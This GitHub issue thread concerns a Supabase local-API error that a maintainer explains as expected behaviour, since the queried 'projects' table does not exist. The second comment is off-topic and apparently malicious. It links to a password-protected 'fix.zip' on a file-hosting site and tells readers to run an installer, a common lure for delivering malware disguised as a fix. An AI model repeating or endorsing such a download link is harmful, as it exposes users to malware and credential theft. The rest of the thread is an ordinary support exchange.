### ISSUE TITLE
Local API: GET projects relation does not exist

### ISSUE THREAD

**Issue by tweinreich** [supabase/supabase#28962]
# Bug report

- [x] I confirm this is a bug with Supabase, not with my own application. 
- [x] I confirm I have searched the [Docs](https://docs.supabase.com), GitHub [Discussions](https://github.com/supabase/supabase/discussions), and [Discord](https://discord.supabase.com). 

## Describe the bug

When using local supabase, installed via homebrew and then calling the API (GET `http://127.0.0.1:54321/rest/v1/projects`), the response is the following error JSON:
```
{
  "code": "42P01",
  "details": null,
  "hint": null,
  "message": "relation \"public.projects\" does not exist"
}
```

## To Reproduce

Steps to reproduce the behavior, please provide code snippets or a repository:

1. Set up local supabase project using the CLI (`supabase init`)
2. Try to query the mentioned endpoint with a GET request

## Expected behavior

Getting a valid response when installing supabase locally.

## System information

- OS: macOS Sonoma 14.6.1
- Browser: Firefox (but also happens using Postman)
- Supabase CLI version: 1.165.0 and 1.191.3

## Additional info
This is not high prio, just wanted to report it.

**Comment by africanobyamugisha** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by encima** [comment]
Hi there,

Thanks for reporting! This is expected behaviour and is a valid response.

To clarify, this endpoint is for getting data from the `projects` table in your instance and this response is because that does not exist. To resolve this you would need to create a `projects` table through the Table Editor.

Additionally, there is the Management API projects endpoint that will retrieve the Supabase projects you have and, locally, this is limited to a single project.

**Comment by tweinreich** [comment]
> Hi there,
> 
> Thanks for reporting! This is expected behaviour and is a valid response.
> 
> To clarify, this endpoint is for getting data from the `projects` table in your instance and this response is because that does not exist. To resolve this you would need to create a `projects` table through the Table Editor.
> 
> Additionally, there is the Management API projects endpoint that will retrieve the Supabase projects you have and, locally, this is limited to a single project.

Hi @encima, 

Thank you for the swift reply and the clarification!
